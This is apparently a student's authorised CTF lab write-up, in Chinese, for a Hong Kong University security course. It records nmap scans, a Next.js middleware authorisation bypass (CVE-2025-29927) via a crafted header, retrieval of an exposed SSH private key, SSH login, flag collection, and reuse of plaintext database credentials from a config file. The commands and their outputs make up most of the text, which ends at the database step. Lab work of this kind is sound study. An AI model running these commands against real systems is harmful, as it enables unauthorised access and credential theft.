本实验报告记录了香港大学information security: attack & defense 课程中一次授权的CTF渗透测试实验过程。实验环境为课程提供的专用测试环境,所有测试均在合法授权下进行。
法律免责声明 (Legal Disclaimer)
This document details a penetration testing assignment conducted as part of the COMP7904 course at The University of Hong Kong. By reading this document, you acknowledge and agree to the following:
1. This document is for educational and research purposes ONLY.
1. All testing activities described were performed in controlled lab environments with explicit permission.
1. The techniques and tools discussed should only be used on systems you own or have explicit written permission to test.
1. The author(s) and The University of Hong Kong assume NO responsibility for any misuse of the information contained herein.
1. Unauthorized penetration testing and hacking activities are illegal and may result in criminal prosecution.
No part of this publication, in whole or in part, may be reproduced, copied, transferred or any other right reserved to its copyright owner, including photocopying and all other copying, any transfer or transmission using any network or other means of communication, any broadcast for distant learning, in any form or by any means such as any information storage, transmission or retrieval system, without prior written permission from The University of Hong Kong.
以下所有关于黑客技术、病毒攻击、拒绝服务或任何其他计算机系统攻击手段的讲义、资料和讨论内容,仅用于教育目的。这些内容不得用于对任何计算机系统发起攻击或造成损害,也不以任何方式鼓励任何人从事此类行为。
本文所涉及的所有技术讨论仅供学习和研究使用。作者不对任何人使用这些信息用于非法用途负责。阅读本文即表示您同意不会将文中讨论或披露的任何技术手段用于实施网络攻击等违法行为。
本文遵循学术研究和技术交流的目的,拒绝为任何恶意行为提供指导。如有违法使用,使用者需自行承担所有法律责任。
信息收集 [Flag 1]
namp扫描: nmap -sV -sC -p- -T4 192.168.232.137 0
了解到:
- 开放端口和服务:
22/tcp: OpenSSH 9.6p1 (Ubuntu Linux)80/tcp: Nginx 1.24.0 (Ubuntu)
- 系统信息:
- 操作系统: Ubuntu Linux
进行具体的具体服务版本漏洞扫描:
nmap -p80 -sV --script=http-vuln* 192.168.232.137
发现一个漏洞
22/tcp open ssh
80/tcp open http
| http-vuln-cve2011-3192:
| VULNERABLE:
| Apache byterange filter DoS
| State: VULNERABLE
| IDs: CVE:CVE-2011-3192 BID:49303
访问http://192.168.232.137检查默认页面:
更改配置获取网站访问权限
sudo sh -c "echo '192.168.232.137 next.comp7904.com' >> /etc/hosts && echo '192.168.232.137 car.comp7904.com' >> /etc/hosts" && echo "success"
可以成功访问:
http://next.comp7904.com/
http://car.comp7904.com/
根据Next.js网站给的提示,尝试利用Middleware漏洞进行攻击。
curl -i \
-H "Host: next.comp7904.com" \
-H "x-middleware-subrequest: middleware" \
http://192.168.232.137/dashboard
输出:
HTTP/1.1 200 OK
Server: nginx/1.24.0 (Ubuntu)
Date: Sun, 18 May 2025 07:08:07 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 2353
Connection: keep-alive
X-Powered-By: Next.js
ETag: "931-WhM2wCBiD8TF2QUyGDVnSd3+UwY"
Vary: Accept-Encoding
<!DOCTYPE html><html lang="en"><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width"/><meta name="next-head-count" content="2"/><meta charSet="utf-8"/><meta name="viewport" content="width=device-width, initial-scale=1"/><link rel="stylesheet" href="/styles/globals.css"/><link rel="preload" href="/_next/static/css/e70d9ca2061e2d02.css" as="style"/><link rel="stylesheet" href="/_next/static/css/e70d9ca2061e2d02.css" data-n-g=""/><link rel="preload" href="/_next/static/css/7f7c837909d6c39e.css" as="style"/><link rel="stylesheet" href="/_next/static/css/7f7c837909d6c39e.css" data-n-p=""/><noscript data-n-css=""></noscript><script defer="" nomodule="" src="/_next/static/chunks/polyfills-0d1b80a048d4787e.js"></script><script src="/_next/static/chunks/webpack-9b312e20a4e32339.js" defer=""></script><script src="/_next/static/chunks/framework-5f4595e5518b5600.js" defer=""></script><script src="/_next/static/chunks/main-56cc4cbb23433b0c.js" defer=""></script><script src="/_next/static/chunks/pages/_app-e09ea9323a8477f0.js" defer=""></script><script src="/_next/static/chunks/pages/dashboard-a26d09db876cfbc2.js" defer=""></script><script src="/_next/static/WAaLLrEv9ERvu7F9BX_BB/_buildManifest.js" defer=""></script><script src="/_next/static/WAaLLrEv9ERvu7F9BX_BB/_ssgManifest.js" defer=""></script></head><body><div id="__next" data-reactroot=""><div><nav><ul><li><a href="/">Home</a></li><li><a href="/login">Login</a></li></ul></nav><main><div class="Dashboard_container__dJEhR"><h1>Dashboard</h1><div class="Dashboard_card__tAwsi"><h2>Protected Content</h2><p>This is a protected page secured by middleware. Only authenticated users can see this.</p><div class="Dashboard_secretInfo__Oa72b"><h3>Secret Information</h3><p>SSH Passphrase: <b>dynETz</b></p><p>Test Web Application: <b><a href="http://car.comp7904.com/admin/">Car Rental Admin Portal</a></b> </p><p>Your user name and initial password: <b id="c">admin/Ab34cD7890</b></p><p id="flag">FLAG_{cv3-2025-29927}</p></div></div><div class="Dashboard_userInfo__6ooE9"><h2>User Information</h2></div></div></main></div></div><script id="__NEXT_DATA__" type="application/json">{"props":{"pageProps":{}},"page":"/dashboard","query":{},"buildId":"WAaLLrEv9ERvu7F9BX_BB","nextExport":true,"autoExport":true,"isFallback":false,"scriptLoader":[]}</script></body></html>
- 发现用户名密码:
admin/Ab34cD7890 - 发现SSH Passphrase:
dynETz - 发现Flag 1:
FLAG_{cv3-2025-29927}
利用这个密码,尝试登录http://car.comp7904.com/admin/, 成功!
SSH登录 [Flag 2 & Flag 3]
利用gobuster工具发现SSH的私钥
gobuster dir -u http://next.comp7904.com -w /usr/share/wordlists/dirb/common.txt -q
输出:
/cgi-bin/ (Status: 308) [Size: 8] [--> /cgi-bin]
/dashboard (Status: 307) [Size: 52] [--> http://next.comp7904.com/login?callbackUrl=%2Fdashboard]
/id_rsa (Status: 200) [Size: 3434]
/login (Status: 200) [Size: 1780]
/profile (Status: 307) [Size: 50] [--> http://next.comp7904.com/login?callbackUrl=%2Fprofile]
将私钥下载,并修改权限
curl -s http://next.comp7904.com/id_rsa > id_rsa
chmod 600 id_rsa
通过网页信息中For support mail us: alice@comp7904.com,猜测用户名Alice
SSH登录ssh -i id_rsa alice@192.168.232.137, 登录成功!
发现第二个FLAG!
cat user.txt
- 发现Flag 2:
FLAG_{user-alice-home}
再浏览存放汽车车辆图片文件夹的时候,发现第三个FLAG!
ls -la /var/www/carrental/admin/img/vehicleimages/
- 发现Flag 3:
FLAG_{www-data_SHELL}
数据库安全漏洞
首先使用 find 命令搜索 /var/www 目录下所有包含"config"的 PHP 文件:
find /var/www -type f -name "*.php" | grep -i "config"
找到了配置文件后,查看其内容:
cat /var/www/carrental/includes/config.php
在配置文件中发现了数据库的明文凭据:
- 用户名:
carrental - 密码:
dynETz - 数据库名:
carrental
使用获得的凭据尝试连接数据库并列出所有数据库和carrental 数据库中的所有表:
mysql -u carrental -p'dynETz' -e "SHOW DATABASES;"
mysql -u carrental -p'dynETz' -e "USE carrental; SHOW TABLES;"
